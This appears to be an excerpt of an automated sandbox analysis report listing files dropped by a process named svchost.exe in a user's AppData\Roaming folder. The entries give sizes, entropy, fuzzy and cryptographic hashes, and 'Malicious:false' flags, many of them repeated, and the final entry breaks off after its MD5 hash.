                                                          SSDEEP:6:qQwYtb4wupNU889u6iMGA0AEkxAulfvqEX8GcoDrtq8tXjTE9eOsWMNpjW:qQ5F4PjX8s6/X0svxX8GcAtZsU6J
                                                          MD5:DCB83B9DF017326FF821A3C9FBDD121C
                                                          SHA1:CA4FBEB6024A29E67ADAD97AF3237E6B66D6B8B4
                                                          SHA-256:76A933ED5E4CDC3EA91850F8D8FFEE77E97D44A78A68EB0D5336841D9ACC5601
                                                          SHA-512:FF290C508E6B7921E12535C8A17EB82E142B62777B53ADE0929E89435530D16CA87DA10B6A58C45D97B7A32EAD7AEAC3074B7650AC1911DD5AB44E6A33CFE79E
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.822744165379769
                                                          Encrypted:false
                                                          SSDEEP:48:9hSkS0ZEOL8rkMvFZg0o0pUl5WnDhP98o2fR94Fqt:rSk1uW8AUZg0oiUzEKo0GFqt
                                                          MD5:0C6A493EF4F810A60C2C437B35705674
                                                          SHA1:E731EAF9E0128CFFDC196C412573FEB25EDA9C5C
                                                          SHA-256:926982E2192CE74809E44DF6C15917F9C81481E161220ED34F2FD327A53E7A9F
                                                          SHA-512:A30BAAF33394855A32B5F6170932C30C177E37B4EA2B78BB5ECD6E373C20E6AADB1ECB802045A87F1BBD78086E033B959BA18D6FF1CA6765A14F7719FF59D641
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.806057614863617
                                                          Encrypted:false
                                                          SSDEEP:48:FrNnp4Cd7yJxymdsYoVjbviD5nSjFrPkbeIV7/gAz:3p4o7yJxD7rMxPPI1F
                                                          MD5:4CDE2894803021DE938C1E9E6733E25A
                                                          SHA1:D5A02A7A5CE8C07228CD98C6102158820C9BF46A
                                                          SHA-256:12649BE37202E60802F8C8BF81212F6B30A24556CA258E888E4CBB754F0E628C
                                                          SHA-512:D9A446C3EA0F8B7EE6258AD8391876FBA0F58B3BBF6A16D9366F82D2DAAE836F570727344BD2ABBB7C04DA32F64C6DE716DE4EE3EB732AA1BD21BFFA1286594B
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1712
                                                          Entropy (8bit):7.814599162371823
                                                          Encrypted:false
                                                          SSDEEP:48:FCBZ7Hxz76R0a3g5rNXoKMmiUEbpXqDCkD6bdQRK2+MTeq5fc+1:KH16RI9odZtRkD6biRK2jEw
                                                          MD5:3B1D432AC9479A527E1B22B169427577
                                                          SHA1:51BD34C5FC35BD772EF78743B25A2F70CC48F8F6
                                                          SHA-256:673A3F2DCB45241376734F8196B9F32991E5271C2C67A627F7F21A7822EDED92
                                                          SHA-512:D8C1C461F351F85459F9FB55D6E58E6C7AB33C7A53E50889AABB3850C8F5B4D4FEBFAB44D1BF2CABB4D51CCE15EA562127025CE6EF0D3284129B3255E2964098
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.811026542938948
                                                          Encrypted:false
                                                          SSDEEP:48:90K6HQCBxH82BjW05d44uaFPXRSdYLrwqaD:367xH8i1/PXRFO
                                                          MD5:8B34CBF9BBE9A3926A44D1EC18FA6C82
                                                          SHA1:E676F29132F48A629697DA2453268355AABD584D
                                                          SHA-256:1AF832463649194C39C706BF82109B72798021E9C98B5E125707DEED54B28D7F
                                                          SHA-512:4F1366735F0AC65B5734049B231AD0284BE7330C589B91411A185A775BB784FAEB404EE4357F22C243F90D17379699C4118DD806E43A1FD875D6EB529BEB9926
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1776
                                                          Entropy (8bit):7.827752906363399
                                                          Encrypted:false
                                                          SSDEEP:24:UL5C7yWqG0nNYWp489WIhUwMyIMImLcSmr8T+zgQvLEbd2qlvBYSqO9zHw+IWOY4:IC7cNjU71yJImgrrbgCEMqlvJBwmOY4
                                                          MD5:6B186D21E7F9249BBB757C7B5364BF0E
                                                          SHA1:ED9212F49E67BAAC1CC22D85B3CB139A25416432
                                                          SHA-256:68B90A9F2BCBE80B1436581E0CF5DD0E35A19ACB8C6B27CA962345D3E978CAD9
                                                          SHA-512:8F4273831E3C86CEEE8BCC9AA6FE4A61C79C973BE1E3AA8781CC1F419A8459A09D2BD654512EA668D17B57370D808ACBE87E6E5EEE042683E78C3E3014A12B79
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1776
                                                          Entropy (8bit):7.824163156917345
                                                          Encrypted:false
                                                          SSDEEP:24:t/v5/GFSi9kcPityVBAlPZLZ+VFnFM/XB20fK5bWofqZGfo98DqXmcmfjkmkvk:t/BgSUwKVXM/Rbmq79OqFaYmk8
                                                          MD5:0F7FEABFE8D03662EDA3953BB9F7D9F0
                                                          SHA1:A4CFE6CE85D22D91D1D5466C8D4B8D2D5357BB05
                                                          SHA-256:0A68712C8A911CC48321262B902B9358A0596FAF7C4E75F4FA046DF18B1CB66C
                                                          SHA-512:1CB619DA8DD32E7DFB3506668A83971E1CD010EB7B5DACB644906E868F96734BE20FA0C0AAB8CFC5DBB87650E07ACD39F208417F3DCA44EA8B0721E0B853BCFD
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1728
                                                          Entropy (8bit):7.822658151018265
                                                          Encrypted:false
                                                          SSDEEP:48:mcuhNK7sMn4yyisW5AoMm4Ms4e21pF6JbcaF:8N4Pn4RcAoMmt97zF54
                                                          MD5:947248C4AE30D3B70F3D1B84B64AAA20
                                                          SHA1:DC3A65E7AB5400015BCE1487DD52E8D7F17CE2C7
                                                          SHA-256:A5BE7006BCFD13A5941494461688803B3F5D9499A6826BD29F9CC2E74E38B679
                                                          SHA-512:EE1F658545F62C6FC69FED79C2DDF73175558E41CBA44AC9873809380A655BB08EC13031DA461CD834AC40FA5DFA88559CF1C2B8A9ACEC0930708AF435C12A76
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.8124094276530505
                                                          Encrypted:false
                                                          SSDEEP:48:sjlyr1dvxMRaycZEpHJFqBGAN8/EG4GCsnvagA:o41dvKwd8pFuGA8kGJG
                                                          MD5:31DF7C02F64EFE2F74890B71ED7D4B10
                                                          SHA1:78C74CFA81279DAAACE40028BAD27EDE6F4C7405
                                                          SHA-256:01EE961EEEB9F6F3195484D5D60258D1EDE5BC53A7781AC71FE5FD57F117A5F3
                                                          SHA-512:8F9B4737912A8747527E3F61FB3CEF02D5C61EE93E3F79A63468607BC914486EE4895F16F46A2C15E52A284E0D6B53EA318ABA898D17105E83235598B5ACBAB3
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1712
                                                          Entropy (8bit):7.814884831121784
                                                          Encrypted:false
                                                          SSDEEP:48:weJ645j1oe9vXDzyE2EBoukoX3Sc14m4ZZIQz:dJN2ehXDzB2EBoukoXR14vZiQz
                                                          MD5:3CBE33C20FDC6BE52C4F052C7A831028
                                                          SHA1:076AA68F13BEC82E93CC9F2E2D783707D497430C
                                                          SHA-256:154B025DBDEEC84786381C52CADF2AB13E01E2CFA7E4BE7D32FF329D40557865
                                                          SHA-512:B909C168B9627314F5F12E354C19CC2795B9ACF8F5E33908532DF419B1CB1510033AAA3CC2FAC93F3B99D79F14CF9AD3AFB55629F096027462EFE6C8DBB98F48
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.8078171680073405
                                                          Encrypted:false
                                                          SSDEEP:24:UL+CnovnUM8SYST2qUu4tD+NVVqJrxUS/HId7JXFZWWgq8T73mi3gVdNQZdFJ5U6:rzvUM5b2vWVVyrq5JT8573pwQdFJ5JJ
                                                          MD5:A76F3CEB5EA2A8BA22E2FB18BD34D34D
